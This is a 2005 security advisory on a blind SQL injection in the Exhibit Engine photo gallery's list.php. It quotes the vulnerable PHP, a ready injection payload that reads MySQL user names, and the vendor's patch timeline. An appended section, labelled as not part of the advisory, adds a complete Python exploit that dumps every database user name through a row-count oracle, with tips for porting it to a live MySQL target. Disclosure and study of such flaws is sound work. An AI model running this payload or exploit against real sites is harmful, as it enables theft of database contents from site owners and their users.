Exhibit Engine Blind SQL Injection

SEC-CONSULT Security Advisory 20050602-2

=============================================================================
title: Exhibit Engine Blind SQL Injection
program: Exhibit Engine
vulnerable version: 1.22, 1.54 RC4
homepage: photography-on-the.net/ee/
          photography-on-the.net/ee/beta/
found: 2005-06-01
by: sk0L / SEC-CONSULT / www.sec-consult.com
=============================================================================


vendor description:
---------------
The Exhibit Engine is a PHP/MySQL application for smooth and versatile online
photograph display. It's especially designed to give detailed technical info on
each photo, with text descriptions and gear info, but all that technical data
is not required.


vulnerability overview:
---------------
SQL injection is possible through several POST parameters of the script
list.php. Although there is no way to get output from UNION statements
directly, there is at least one way to read arbitrary database entries via
blind SQL injection.


proof of concept:
---------------
Here is the relevant code section from list.php:

---- code -----

// $search_row comes straight from the POST request and is placed in the
// query unquoted, so no quote character has to be broken to inject SQL.
$resultcount = mysql_query(
"
SELECT 
	ee_photo.ee_photo_id
FROM 
	[...]
WHERE 
	ee_photo.ee_photo_for_www = 'yes' 
	AND $search_row LIKE '$wildcard1$keyword$wildcard2'
	AND ...
"
	);

if (!$resultcount) {
	$queryname = "resultcount";
	include("db_error.php");
}


// the oracle: $offset is capped by the size of the result of the first
// query, so a TRUE probe leaves $offset at 1 and a FALSE probe sets it to 0.
$total = mysql_num_rows($resultcount);
$how_many = count($count_total);
if ($offset>$how_many)
{$offset = $how_many;
}

// $sort_row, $order, $offset and $perpage are interpolated unquoted as well.
// a bogus $sort_row or $order makes this query fail, and the tail of the
// MySQL error message, from which $offset can be read, is echoed back.
$fetchlist = mysql_query(
"
SELECT 
	$q0,$q1,...,$q43
FROM 
	ee_photo,
	[...]
	ee_order_to_exhibition
WHERE 
	ee_photo.ee_photo_for_www = 'yes' 
	[...]
	AND ee_exhibition.ee_exhibition_pass = '$pass'
ORDER 
	by $sort_row $order
LIMIT 
	$offset,$perpage
"
	);

---- /code ----


We can inject SQL into the variables $search_row, $sort_row, $order and
$perpage without having to escape any quotes, because none of them is placed
inside quotes in the query. Unfortunately, a UNION can only be put into
$search_row, and as $search_row is used in both queries, which have a
different number of columns, a UNION will inevitably produce an error in one
of them. We can use blind SQL injection, though:

* set $offset=1

* put the injection string into $search_row, e.g.:

search_row=ee_photo.ee_photo_exif_iso%3D1+AND+1%3D2+UNION+SELECT+user+FROM+mysql.user+WHERE+user+LIKE+0x254125+/*+

  (0x254125 is the hex form of '%A%', so no quote characters are needed; the
  trailing /* opens a comment that swallows the rest of the original WHERE
  clause)

* "AND 1=2" removes every photo row, so mysql_num_rows() counts only the rows
  returned by the UNIONed SELECT: if there is at least one (TRUE), $offset
  stays 1; if there is none (FALSE), it is set to 0.

* now we still have to produce an error in the second query by specifying
  some bogus $sort_row or $order. Exhibit echoes the last part of the MySQL
  error message, which quotes the query text around the error, so we can
  read the value of $offset from it.

It should be relatively easy to code an exploit for this (sorry, but I don't
have the time at the moment).
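
The following is an added example, not part of the SEC-CONSULT advisory or of
Exhibit Engine: a Python simulation of the oracle described above together with
an exploit that drives it. An in-memory SQLite database stands in for MySQL. The
function list_php() interpolates search_row exactly as the PHP does and returns
the capped $offset (the advisory's description, TRUE leaves it at 1 and FALSE
sets it to 0, is taken as given, and reading it out of the echoed error message
is replaced by a direct return value). The table layout, the sample user names,
and quoted string literals in place of the advisory's hex literal (SQLite reads
0x254125 as an integer, MySQL as the string '%A%') are assumptions of the
simulation. Instead of a single yes/no question the example walks the whole
user column by prefix probing, which recovers every name.

```python
"""Blind SQL injection against a simulated Exhibit Engine list.php.

Added example; not code from the advisory or from Exhibit Engine.  An
in-memory SQLite database models the row-count oracle the advisory describes:
the injected search_row value is pasted into the first query unquoted, the
row count stands in for $how_many, and $offset=1 is set to 0 when no row
comes back.  The exploit part then recovers every name in mysql.user one
character at a time.  Table layout, sample rows and the quoted string
literals (SQLite reads 0x254125 as an integer) are assumptions made here.
"""
import sqlite3

# Constructed sample data: a photo table and a stand-in for mysql.user.
SCHEMA = """
CREATE TABLE ee_photo (
    ee_photo_id        INTEGER,
    ee_photo_for_www   TEXT,
    ee_photo_exif_iso  INTEGER,
    ee_photo_title     TEXT
);
INSERT INTO ee_photo VALUES (1, 'yes', 100, 'sunset');
INSERT INTO ee_photo VALUES (2, 'yes', 400, 'harbour');
INSERT INTO ee_photo VALUES (3, 'no',  100, 'draft');
CREATE TABLE mysql.user (user TEXT, host TEXT);
INSERT INTO mysql.user VALUES ('root',   'localhost');
INSERT INTO mysql.user VALUES ('eeweb',  'localhost');
INSERT INTO mysql.user VALUES ('backup', 'localhost');
"""

# Characters tried at each position.  LIKE is case-insensitive, so the
# lower-cased form of each name is what comes back.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def build_db():
    """Create the simulated application database with a 'mysql' schema attached."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS mysql")
    conn.executescript(SCHEMA)
    return conn


def list_php(conn, search_row, offset, wildcard1="%", keyword="", wildcard2="%"):
    """Mimic the $resultcount query and the $offset cap from list.php.

    search_row is pasted into the SQL unquoted, as in the original.  The
    return value is $offset after the cap; the advisory observes that the
    real application echoes it inside the second query's SQL error message.
    """
    sql = (
        "SELECT ee_photo.ee_photo_id FROM ee_photo "
        "WHERE ee_photo.ee_photo_for_www = 'yes' "
        f"AND {search_row} LIKE '{wildcard1}{keyword}{wildcard2}'"
    )
    total = len(conn.execute(sql).fetchall())   # $total = mysql_num_rows(...)
    if offset > total:                          # if ($offset>$how_many) ...
        offset = total
    return offset


def oracle(conn, probe_select):
    """Answer one yes/no question: does probe_select return at least one row?

    Same shape as the advisory's payload: 'AND 1=2' removes every photo row,
    the UNIONed one-column SELECT supplies the rows whose count is the answer,
    and the opening comment swallows list.php's trailing LIKE '...' clause.
    """
    payload = f"ee_photo.ee_photo_exif_iso=1 AND 1=2 UNION {probe_select} /* "
    return list_php(conn, payload, offset=1) == 1


def dump_users(conn, prefix="", found=None):
    """Recover all values of mysql.user.user by depth-first prefix probing."""
    if found is None:
        found = []
    # A LIKE pattern without wildcards tests for an exact (case-insensitive) match.
    if prefix and oracle(conn, f"SELECT user FROM mysql.user WHERE user LIKE '{prefix}'"):
        found.append(prefix)
    for c in CHARSET:
        if oracle(conn, f"SELECT user FROM mysql.user WHERE user LIKE '{prefix}{c}%'"):
            dump_users(conn, prefix + c, found)
    return found


if __name__ == "__main__":
    db = build_db()
    print("recovered user names:", dump_users(db))
```

Run it as a script to see the recovered names. Against a real MySQL target a
few things change: names containing '_' or '%' need those characters escaped
in the LIKE pattern, LIKE is case-insensitive unless the comparison is made
BINARY, and every oracle call costs one HTTP request, so a per-position
bisection on ORD(SUBSTRING(...)) needs far fewer requests than trying each
character of the charset in turn.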



vulnerable versions:
---------------
Exhibit Engine v1.22 is definitely vulnerable. 1.54 RC4 seems to be vulnerable
too, although exploitation may differ slightly. It is very likely that the
vulnerability exists in most other versions of Exhibit Engine.



vendor status:
---------------
vendor notified: 2005-06-01
vendor response: immediately
patch available: 2005-06-02

Pekka Saarinen has published a workaround for all current versions of
Exhibit Engine. It is available at:

photography-on-the.net/forum/showthread.php


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bernhard Mueller / www.sec-consult.com /

SGT ::: dfa, tke, bfi, mei, flo, walter|bruder :::

~    ___   ___
~   |   |=|_.'   .'|   .'|   .'|=|`.     .'|
~   `.  |      .'  | .' .' .'  | |  `. .'  |
 ==== `.|=|`.  |   |=|.:   |   | |   | |   |  ======
~    ___  |  `.|   |   |'. `.  | |  .' |   |  ___
~    `._|=|___||___|   |_|   `.|=|.'   |___|=|_.
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-